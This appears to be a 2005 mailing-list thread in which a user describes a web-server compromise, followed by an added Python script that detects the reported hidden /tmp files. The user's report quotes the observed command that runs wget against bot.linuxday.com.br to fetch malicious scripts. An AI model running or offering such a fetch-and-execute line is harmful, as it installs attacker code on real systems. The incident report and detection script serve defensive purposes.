On 02/17/2005 10:20:02 PM, paul@xxxxxxxxxxxxxxxxxxx wrote:
Apparently someone has hacked into my webserver and is installing Perl scripts into the /tmp/ directory. They're usually named .linuxday* or .cinta* and a few other names as well.
From what I can tell something is causing Apache to run a command like "sh wget bot.linuxday.com.br -O {the above mentioned files are then listed}"
Sometimes the site is worm.linuxday.com.br
I'm curious if anyone has heard about this before. I'm currently running Fedora 1 with all the latest security patches.
It might not be a vulnerable package, it might be vulnerable code on your server.
Anyway - you've been compromised, which means you have probably already had trojans installed - a clean install would be a good idea - and I would suggest something not legacy, i.e. FC3.
-- Michael A. Peters http://mpeters.us/
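
A triage check for the symptom described in this thread, as an added example that is not part of either message: it lists hidden regular files in a temp directory whose names match the reported `.linuxday*` / `.cinta*` patterns or whose content starts with a script interpreter line. The function name, the `owner_uid` filter and the interpreter-line heuristic are assumptions made for illustration.

```python
import fnmatch
import os
import stat

# Name patterns reported in the thread; the poster notes there are other names too.
REPORTED_PATTERNS = (".linuxday*", ".cinta*")


def find_suspect_tmp_files(directory, patterns=REPORTED_PATTERNS, owner_uid=None):
    """Return sorted (name, reasons) pairs for hidden regular files worth a closer look.

    owner_uid: if given, only consider files owned by that uid
    (for example the account the web server runs as).
    """
    findings = []
    with os.scandir(directory) as entries:
        for entry in entries:
            if not entry.name.startswith("."):
                continue
            try:
                st = entry.stat(follow_symlinks=False)
            except OSError:
                continue  # file vanished or is unreadable
            if not stat.S_ISREG(st.st_mode):
                continue  # skip sockets, directories, symlinks, FIFOs
            if owner_uid is not None and st.st_uid != owner_uid:
                continue
            reasons = []
            if any(fnmatch.fnmatchcase(entry.name, p) for p in patterns):
                reasons.append("name matches reported pattern")
            try:
                with open(entry.path, "rb") as fh:
                    head = fh.read(64)
            except OSError:
                head = b""
            if head.startswith(b"#!"):
                first_line = head.split(b"\n", 1)[0].decode("ascii", "replace")
                reasons.append("hidden script: " + first_line)
            if reasons:
                findings.append((entry.name, reasons))
    return sorted(findings)


if __name__ == "__main__":
    for name, reasons in find_suspect_tmp_files("/tmp"):
        print(name, "; ".join(reasons))
```

A hit only tells you where to start looking; as the reply says, a host in this state should be treated as compromised regardless of what the scan finds.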